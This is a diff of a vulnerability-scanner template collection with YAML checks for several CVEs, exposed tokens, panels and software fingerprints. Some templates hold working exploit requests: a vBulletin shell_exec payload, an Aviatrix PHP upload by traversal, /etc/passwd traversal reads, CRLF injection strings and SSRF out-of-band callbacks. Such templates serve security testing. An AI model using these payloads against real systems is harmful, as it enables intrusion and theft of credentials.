name: Jnoj Directory Traversal for file reading(LFI)
name: Jnoj arbitrary local file inclusion (LFI)
author: pussycat0x
severity: high
reference: https://github.com/shi-yang/jnoj/issues/53
@ -11,11 +11,12 @@ info:
cvss-score: 7.50
cve-id: CVE-2019-17538
cwe-id: CWE-22
description: "Jiangnan Online Judge (aka jnoj) 0.8.0 has Directory Traversal for file reading via the web/polygon/problem/viewfile?id=1&name=../ substring."
description: "Jiangnan Online Judge (aka jnoj) 0.8.0 has directory traversal (LFI) vulnerability via web/polygon/problem/viewfile?id=1&name=../"
requests:
- raw:
- |
GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and

14
vulnerabilities/other/simple-employee-rce.yaml → cves/2019/CVE-2019-20183.yaml
View File

@ -1,11 +1,17 @@
id: simple-employee-rce
id: CVE-2019-20183
info:
name: Simple Employee Records System 1.0 RCE
name: Simple Employee Records System 1.0 arbitrary file upload
description: Simple Employee Records System 1.0 contains an arbitrary file upload due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or RCE.
author: pikpikcu
severity: critical
severity: high
reference: https://www.exploit-db.com/exploits/49596
tags: rce,intrusive
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cwe-id: CWE-434
cve-id: CVE-2019-20183
tags: rce,intrusive,cve,upload,cve2019
requests:
- raw:

3
cves/2020/CVE-2020-17496.yaml
View File

@ -5,7 +5,7 @@ info:
severity: critical
reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
description: |
vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
vBulletin 5.5.4 through 5.6.2 allow remote command execution (RCE) via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
tags: cve,cve2020,vbulletin,rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
@ -17,6 +17,7 @@ requests:
- raw:
- |
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;"

43
cves/2021/CVE-2021-40870.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2021-40870
info:
name: Aviatrix Controller 6.x before 6.5-1804.1922. RCE
author: pikpikcu
severity: critical
description: Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
reference:
- https://wearetradecraft.com/advisories/tc-2021-0002/
- https://nvd.nist.gov/vuln/detail/CVE-2021-40870
tags: cve,cve2021,rce,aviatrix
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-40870
cwe-id: CWE-434
requests:
- raw:
- |
POST /v1/backend1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=HACKERMAN<?php phpinfo()?>
- |
GET /v1/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'HACKERMAN'
- "PHP Extension"
- "PHP Version"
condition: and

27
cves/2021/CVE-2021-40960.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2021-40960
info:
name: Galera WebTemplate 1.0 Directory Traversal
author: daffainfo
severity: high
description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.
reference:
- http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960
tags: cve,cve2021,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

30
cves/2021/CVE-2021-41381.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2021-41381
info:
name: Payara Micro Community 5.2021.6 Directory Traversal
author: pikpikcu
severity: medium
description: Payara Micro Community 5.2021.6 and below allows Directory Traversal
reference:
- https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
- https://nvd.nist.gov/vuln/detail/CVE-2021-41381
tags: cve,cve2021,payara,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2021-41381
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/.//WEB-INF/classes/META-INF/microprofile-config.properties"
matchers-condition: and
matchers:
- type: word
words:
- "payara.security.openid.default.providerURI="
- "payara.security.openid.sessionScopedConfiguration=true"
condition: and
part: body

17
exposed-panels/samba-swat-panel.yaml Normal file
View File

@ -0,0 +1,17 @@
id: samba-swat-panel
info:
name: Samba SWAT panel
author: PR3R00T
severity: info
tags: panel
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- 'Basic realm="SWAT"'
part: header

33
exposures/tokens/digitalocean/tugboat-config-exposure.yaml Normal file
View File

@ -0,0 +1,33 @@
id: tugboat-config-exposure
info:
name: Tugboat configuration file exposure
description: Tugboat is a command line tool for interacting with your DigitalOcean droplets.
reference: https://github.com/petems/tugboat
author: geeknik
severity: critical
tags: tugboat,config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/.tugboat"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "authentication"
- "access_token"
- "ssh_user"
condition: and
extractors:
- type: regex
part: body
regex:
- 'access_token: .*'

17
file/keys/amazon-sns-token.yaml Normal file
View File

@ -0,0 +1,17 @@
id: amazon-sns-token
info:
name: Amazon SNS Token Detect
author: TheBinitGhimire
severity: info
tags: file,token,amazon,aws
file:
- extensions:
- all
extractors:
- type: regex
name: amazon-sns-topic
regex:
- 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+'

23
file/php/php-scanner.yaml
View File

@ -105,15 +105,21 @@ file:
regex:
- 'import_request_variables'
- type: regex
# Avoid use of $GLOBALS
# Avoid use of GLOBALS
regex:
- '\\$GLOBALS'
- 'GLOBALS'
- type: regex
regex:
- '\\$_GET'
- '_GET'
- type: regex
regex:
- '\\$_POST'
- '_POST'
- type: regex
regex:
- '_COOKIE'
- type: regex
regex:
- '_SESSION'
- type: regex
# Ensure the use of type checking validating against booleans (===)
regex:
@ -206,7 +212,7 @@ file:
- type: regex
# MySQLi Extension
regex:
- "mysqli((_real)?_connect)?"
- "mysqli((_real)?_connect)?|_query"
- type: regex
# Oracle OCI8 DBMS
regex:
@ -243,3 +249,10 @@ file:
# XML document
regex:
- "x(ptr|path)_new_context"
- type: regex
# Investigate if GetTableFields is called safely
regex:
- "GetTableFields"
- type: regex
regex:
- "ini_get.*magic_quotes_gpc.*"

3
misconfiguration/put-method-enabled.yaml
View File

@ -5,18 +5,21 @@ info:
author: xElkomy
severity: high
reference: https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled
description: The PUT method is enabled on the web server, allowing for arbitrary file uploads.
tags: injection
requests:
- raw:
- |
PUT /testing-put.txt HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
{{randstr}}
- |
GET /testing-put.txt HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
req-condition: true

28
network/tidb-unauth.yaml Normal file
View File

@ -0,0 +1,28 @@
id: tidb-unauth
info:
name: Unauth TiDB Disclosure
author: lu4nx
severity: high
metadata:
zoomeye-dork: tidb +port:"4000"
tags: network,tidb
network:
- inputs:
- read: 1024 # skip handshake packet
- data: b200000185a6ff0900000001ff0000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640075045f70696406313337353030095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f757365720578787878780f5f636c69656e745f76657273696f6e06382e302e32360c70726f6772616d5f6e616d65056d7973716c # authentication
type: hex
host:
- "{{Hostname}}"
- "{{Hostname}}:4000"
read-size: 1024
matchers:
- type: binary
binary:
# resp format:
# 07: length, 02: sequence number, 00: success
- "0700000200000002000000"

24
technologies/aviatrix-detect.yaml Normal file
View File

@ -0,0 +1,24 @@
id: aviatrix-detect
info:
name: Aviatrix Detect
author: pikpikcu
severity: info
tags: tech,aviatrix
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Aviatrix Controller</title>"
- type: status
status:
- 200

71
technologies/csrfguard-detect.yaml Normal file
View File

@ -0,0 +1,71 @@
id: csrf-guard-detect
info:
name: OWASP CSRF Guard detection
author: forgedhallpass
severity: info
description: Detects OWASP CSRF Guard 3.x & 4.x versions and whether token-per-page support is enabled based on default configuration.
reference: https://github.com/OWASP/www-project-csrfguard
tags: tech,csrfguard
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET /JavaScriptServlet HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
- |
POST /JavaScriptServlet HTTP/1.1
Host: {{Hostname}}
OWASP-CSRFTOKEN: {{masterToken}}
matchers-condition: or
matchers:
- type: word
name: "CSRFGuard-v3.x"
words:
- "FETCH-CSRF-TOKEN"
- type: word
name: "CSRFGuard-v4.x"
words:
- "masterTokenValue"
- type: dsl
name: "Disabled-token-per-page"
condition: and
dsl:
- 'status_code_3==400'
- 'contains(body, "Token-Per-Page functionality is disabled")'
- type: dsl
name: "Enabled-token-per-page"
condition: and
dsl:
- 'status_code_3==200'
- 'contains(body, "{\"pageTokens")'
cookie-reuse: true
extractors:
- type: regex
name: masterToken
internal: true
group: 1
regex:
- "(?:masterTokenValue\\s*=\\s*')([^']+)';"
- type: regex
group: 1
name: "master-token"
regex:
- "(?:masterTokenValue\\s*=\\s*')([^']+)';"
- type: json
name: "page-token"
json:
- '.pageTokens'

31
technologies/fatpipe-mpvpn-detect.yaml Normal file
View File

@ -0,0 +1,31 @@
id: fatpipe-mpvpn-detect
info:
name: FatPipe MPVPN Detect
author: princechaddha
severity: info
tags: tech,fatpipe
requests:
- method: GET
path:
- "{{BaseURL}}/fpui/jsp/login.jsp"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>FatPipe MPVPN&nbsp;| Log in</title>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<h5>([0-9.a-z]+)<\/h5>'

31
technologies/fatpipe-warp-detect.yaml Normal file
View File

@ -0,0 +1,31 @@
id: fatpipe-warp-detect
info:
name: FatPipe WARP Detect
author: princechaddha
severity: info
tags: tech,fatpipe
requests:
- method: GET
path:
- "{{BaseURL}}/fpui/jsp/login.jsp"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>FatPipe WARP&nbsp;| Log in</title>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<h5>([0-9.a-z]+)<\/h5>'

15125
technologies/fingerprinthub-web-fingerprints.yaml Normal file
View File

File diff suppressed because it is too large Load Diff

24
technologies/hp-media-vault-detect.yaml Normal file
View File

@ -0,0 +1,24 @@
id: hp-media-vault-detect
info:
name: HP Media Vault Detect
author: pussycat0x
severity: info
metadata:
fofa-dork: 'app="HP-Media-Vault-Media-Server"'
tags: tech,hp
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- "<title>HP Media Vault"
part: body
- type: status
status:
- 200

63
technologies/vmware-version-detect.yaml Normal file
View File

@ -0,0 +1,63 @@
id: vmware-version-detect
info:
name: vmware-version-detect
author: elouhi
severity: info
description: Sends a POST request containing a SOAP payload to a vCenter server to obtain version information
reference:
- https://www.pwndefend.com/2021/09/23/exposed-vmware-vcenter-servers-around-the-world-cve-2021-22005/
- https://svn.nmap.org/nmap/scripts/vmware-version.nse
tags: tech,vcenter,vmware
requests:
- raw:
- |
POST /sdk/ HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soap:Header>
<operationID>00000001-00000001</operationID>
</soap:Header>
<soap:Body>
<RetrieveServiceContent xmlns="urn:internalvim25">
<_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>
</RetrieveServiceContent>
</soap:Body>
</soap:Envelope>
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'ha-folder-root'
- 'RetrieveServiceContentResponse'
- type: word
words:
- "text/xml"
part: header
extractors:
- type: regex
part: body
group: 1
regex:
- "<name>(.*?)</name>"
- "<version>(.*?)</version>"
- "<build>(.*?)</build>"
- "<osType>(.*?)</osType>"
- "<productLineId>(.*?)</productLineId>"
- "<apiType>(.*?)</apiType>"

23
technologies/yzmcms-detect.yaml Normal file
View File

@ -0,0 +1,23 @@
id: yzmcms-detect
info:
name: YzmCMS Detect
author: pikpikcu
severity: info
tags: yzmcms,tech
requests:
- method: GET
path:
- '{{BaseURL}}/admin/index/login.html'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'Powered By <a href="http://www.yzmcms.com"'

1
vulnerabilities/generic/crlf-injection.yaml
View File

@ -16,7 +16,6 @@ requests:
- "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection"
- "{{BaseURL}}/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection"
- "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.." # Apache
- "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" # CVE-2016-4975
- "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
- "{{BaseURL}}/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection"

47
vulnerabilities/generic/oob-header-based-interaction.yaml Normal file
View File

@ -0,0 +1,47 @@
id: oob-header-based-interaction
info:
name: Header Based Generic OOB Interaction
author: pdteam
severity: info
description: The remote server fetched a spoofed URL from the request headers.
reference: https://github.com/PortSwigger/collaborator-everywhere
tags: oob,ssrf,generic
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@{{interactsh-url}}
Referer: http://{{interactsh-url}}/ref
Cf-Connecting_ip: spoofed.{{interactsh-url}}
X-Real-Ip: spoofed.{{interactsh-url}}
From: root@{{interactsh-url}}
True-Client-Ip: spoofed.{{interactsh-url}}
Client-Ip: spoofed.{{interactsh-url}}
Forwarded: for=spoofed.{{interactsh-url}};by=spoofed.{{interactsh-url}};host=spoofed.{{interactsh-url}}
X-Client-Ip: spoofed.{{interactsh-url}}
X-Originating-Ip: spoofed.{{interactsh-url}}
X-Wap-Profile: http://{{interactsh-url}}/wap.xml
X-Forwarded-For: spoofed.{{interactsh-url}}
Contact: root@{{interactsh-url}}
X-Forwarded-Host: spoofed.{{interactsh-url}}
X-Host: spoofed.{{interactsh-url}}
X-Forwarded-Server: spoofed.{{interactsh-url}}
X-HTTP-Host-Override: spoofed.{{interactsh-url}}
Cache-Control: no-transform
matchers-condition: or
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"
- type: word
part: interactsh_protocol
name: dns
words:
- "dns"

21
vulnerabilities/generic/oob-param-based-interaction.yaml Normal file
View File

@ -0,0 +1,21 @@
id: oob-param-based-interaction
info:
name: Parameter Based Generic OOB Interaction
author: pdteam
severity: info
description: The remote server fetched a spoofed URL from the request parameters.
reference: https://github.com/PortSwigger/collaborator-everywhere
tags: oob,ssrf,generic
requests:
- method: GET
path:
- "{{BaseURL}}/?u=http://{{interactsh-url}}/&href=http://{{interactsh-url}}/&action=http://{{interactsh-url}}/&host={{interactsh-url}}&http_host={{interactsh-url}}&email=root@{{interactsh-url}}&url=http://{{interactsh-url}}/&load=http://{{interactsh-url}}/&preview=http://{{interactsh-url}}/&target=http://{{interactsh-url}}/&proxy=http://{{interactsh-url}}/&from=http://{{interactsh-url}}/&src=http://{{interactsh-url}}/&ref=http://{{interactsh-url}}/&referrer=http://{{interactsh-url}}/"
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"

56
vulnerabilities/generic/request-based-interaction.yaml Normal file
View File

@ -0,0 +1,56 @@
id: request-based-interaction
info:
name: OOB Request Based Interaction
author: pdteam
severity: info
description: The remote server fetched a spoofed DNS Name from the request.
reference: https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface
tags: oob,ssrf,generic
requests:
- raw:
- |+
GET / HTTP/1.1
Host: {{interactsh-url}}
Cache-Control: no-transform
Accept: */*
- |+
GET / HTTP/1.1
Host: @{{interactsh-url}}
Cache-Control: no-transform
Accept: */*
- |+
GET http://{{interactsh-url}}/ HTTP/1.1
Host: {{Hostname}}
Cache-Control: no-transform
Accept: */*
- |+
GET @{{interactsh-url}}/ HTTP/1.1
Host: {{Hostname}}
Cache-Control: no-transform
Accept: */*
- |+
GET {{interactsh-url}}:80/ HTTP/1.1
Host: {{Hostname}}
Cache-Control: no-transform
Accept: */*
unsafe: true # Use Unsafe HTTP library for malformed HTTP requests.
matchers-condition: or
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"
- type: word
part: interactsh_protocol
name: dns
words:
- "dns"

Some files were not shown because too many files have changed in this diff Show More